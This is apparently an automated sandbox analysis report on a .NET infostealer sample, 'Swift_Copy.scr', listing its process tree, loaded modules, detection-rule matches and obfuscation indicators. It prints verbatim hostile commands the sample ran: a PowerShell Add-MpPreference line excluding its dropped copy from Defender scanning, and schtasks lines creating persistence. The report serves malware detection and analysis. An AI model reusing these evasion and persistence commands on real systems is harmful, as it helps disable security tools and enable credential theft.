Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05DD9AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05DD5018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05DD3268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00DFE06F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00DF9BF3
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_0154D93C
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_05841104
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_05841E40
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_0788A750
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_0788C398
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_0788D330
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_07883E98
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_07881EAF
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_07881EC0
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_0788CD48
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_0788AB98
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_07887B90
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_0EFF2470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_01229378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_01229B38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_01224A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_01223E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0122CEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_012241C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_062C56F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_062C3F68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_062C8C04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_062CDD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_062C2AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_062C9AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_062C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_062CBFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_062C3268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_062C5018
Source: Swift_Copy.scr | Static PE information: invalid certificate
Source: Swift_Copy.scr, 00000000.00000002.2108100860.0000000004D8E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Swift_Copy.scr
Source: Swift_Copy.scr, 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamee4a58f0f-9f80-4bf8-83da-c8b835e59bd6.exe4 vs Swift_Copy.scr
Source: Swift_Copy.scr, 00000000.00000002.2105660594.000000000167E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Swift_Copy.scr
Source: Swift_Copy.scr, 00000000.00000002.2106668901.00000000033B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Swift_Copy.scr
Source: Swift_Copy.scr, 00000000.00000002.2110825783.0000000005F50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Swift_Copy.scr
Source: Swift_Copy.scr, 00000000.00000002.2106668901.00000000033F6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamee4a58f0f-9f80-4bf8-83da-c8b835e59bd6.exe4 vs Swift_Copy.scr
Source: Swift_Copy.scr, 00000000.00000002.2112955026.000000000BBD0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Swift_Copy.scr
Source: Swift_Copy.scr | Binary or memory string: OriginalFilenameDwip.exeL vs Swift_Copy.scr
Source: Swift_Copy.scr | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8.2.WAuLmtFUmD.exe.50a5450.11.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.WAuLmtFUmD.exe.506aa30.9.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Swift_Copy.scr.44510c0.10.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Swift_Copy.scr.44166a0.9.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Swift_Copy.scr.44166a0.9.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.WAuLmtFUmD.exe.506aa30.9.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Swift_Copy.scr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WAuLmtFUmD.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, OTWUo99bfyR.cs | Cryptographic APIs: 'TransformFinalBlock' (2 occurrences)
Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, Ui9qhZiA7.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, Ui9qhZiA7.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, BqMB7yHhrXg.cs | Cryptographic APIs: 'TransformFinalBlock' (4 occurrences)
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, rWUR7gJwO4M8XQmEUW.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, nZ6fwD6Co1KFKaRig4.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, nZ6fwD6Co1KFKaRig4.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, nZ6fwD6Co1KFKaRig4.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.spyw.evad.winSCR@16/11@1/1
Source: C:\Users\user\Desktop\Swift_Copy.scr | File created: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Mutant created: \Sessions\1\BaseNamedObjects\rlJOpRb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4724:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1960:120:WilError_03
Source: C:\Users\user\Desktop\Swift_Copy.scr | File created: C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp
Source: Swift_Copy.scr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Swift_Copy.scr | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Swift_Copy.scr | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Swift_Copy.scr | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WAuLmtFUmD.exe.0.dr | Binary or memory string: select * from Cititor where email like @Nume and parola like @Parola;
Source: Swift_Copy.scr | Virustotal: Detection: 45%
Source: Swift_Copy.scr | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\Swift_Copy.scr | File read: C:\Users\user\Desktop\Swift_Copy.scr:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\Swift_Copy.scr "C:\Users\user\Desktop\Swift_Copy.scr" /S
Source: C:\Users\user\Desktop\Swift_Copy.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Swift_Copy.scr | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Swift_Copy.scr | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Swift_Copy.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"
Source: C:\Users\user\Desktop\Swift_Copy.scr | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp"
Source: C:\Users\user\Desktop\Swift_Copy.scr | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp"
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: version.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Swift_Copy.scr | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Swift_Copy.scr | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: Swift_Copy.scr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Swift_Copy.scr | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Swift_Copy.scr, Form1.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, nZ6fwD6Co1KFKaRig4.cs | .Net Code: E9vdbEksc9 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Swift_Copy.scr.5f50000.11.raw.unpack, HomeView.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_0584193B pushfd ; retf 8_2_05841941
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_0788F88C push es; retf 8_2_0788F88F
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_0EFF0CA9 push cs; retf 8_2_0EFF0CB8
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 8_2_0EFF3109 push esp; retf 8_2_0EFF3115
Source: Swift_Copy.scr | Static PE information: section name: .text entropy: 7.876501523545841
Source: WAuLmtFUmD.exe.0.dr | Static PE information: section name: .text entropy: 7.876501523545841
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, henXBbc3yZCYFXacjK.cs | High entropy of concatenated method names: 'YlkWGtfh5G', 'dfKWrGZXWK', 'gdCPVwXoG7', 'jdiP7clQjO', 'HI0PoYaQDs', 'OmOPERVnT2', 'NVkPBwByRp', 'GCdPN9Os3l', 'FrrPmqEkVg', 'iQgPyALoyk'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, nZ6fwD6Co1KFKaRig4.cs | High entropy of concatenated method names: 'rdrLTA1550', 'jKcLHA57oh', 'ggoLwK5CDI', 'G7rLPkv9gY', 'bgyLWfkLlA', 'h0kLMDuZ7h', 'ysdLCyPXP6', 'jGSL6KJuvW', 'syFLjrxL8y', 'cEBLZ9uGAS'
